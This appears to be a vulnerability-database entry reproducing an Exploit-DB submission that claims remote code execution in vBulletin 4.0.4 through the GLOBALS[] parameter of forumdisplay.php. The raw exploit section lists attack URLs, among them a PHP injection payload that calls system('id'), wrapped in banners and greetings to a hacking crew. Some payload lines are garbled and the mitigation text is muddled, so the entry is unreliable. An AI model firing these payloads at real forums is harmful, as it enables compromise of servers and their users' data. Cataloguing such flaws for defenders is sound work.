Vurnerebility vBulletin - http://www.vbulletin.org Code Execution

vendor:

vBulletin

by:

mc2_s3lector

9,3

CVSS

HIGH

Local or adserver Javascript,forumdisplay.php Code Execution

CWE

Product Name: vBulletin

Affected Version From: 4.0.4

Affected Version To: 4.0.4

Patch Exists: YES

Related CWE: N/A

CPE: a:vbulletin:vbulletin:4.0.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2012

Vurnerebility vBulletin – http://www.vbulletin.org Code Execution

A vulnerability in vBulletin 4.0.4 allows an attacker to execute arbitrary code on the vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input passed to the 'GLOBALS[]' parameter in 'forumdisplay.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary code on the system with the privileges of the web server process. Successful exploitation of this vulnerability may result in complete compromise of vulnerable system.

Mitigation:

Upgrade to the latest version of vBulletin 4.0.4 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

/*======================================================================*\
|| #################################################################### ||
|| # Vurnerebility vBulletin - http://www.vbulletin.org               # ||
|| # Local or adserver Javascript,forumdisplay.php" Code Execution    # ||
|| # Version license 4.0.4					      # ||
|| # info set cookies, error issue & critical-information-disclosure  # ||
|| # Dork powered by vBulletin 4.0.4				      # ||
|| # author mc2_s3lector					      # ||
|| # Contact|http://www.yogyacarderlink.web.id			      # ||
|| #################################################################### ||
\*======================================================================*/
                         
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart

/*======================================================================*\
|# #####################################################################  |
 # gretz: all family(www.yogyacarderlink.web.id)			# |			 
|# v3n0m,m4rc0,eidelweis,Joglo,setanmuda,z0mb13,byebye,93l4p_9uL1t@,	# |
|# IdioT_InsidE,dewancc,craxboy90,lingga,horcux,artupas,s0ul_34t3r,	# |
|# mywisdom,Travis,a9d1co0L,L4zyb0i,Jastis & all  			# |
|# KeDaiComputerworks.org						# |
|# my bro one-d4y,elpaci4n0,Ariwira,h3ndry_Slank,raven_ville, t3j0,& all# |				   		   
|# Indesign Computer Care,logcode.net,flowerjingga,.alboraaq.com	# | 
|  #####################################################################  |
\*======================================================================*/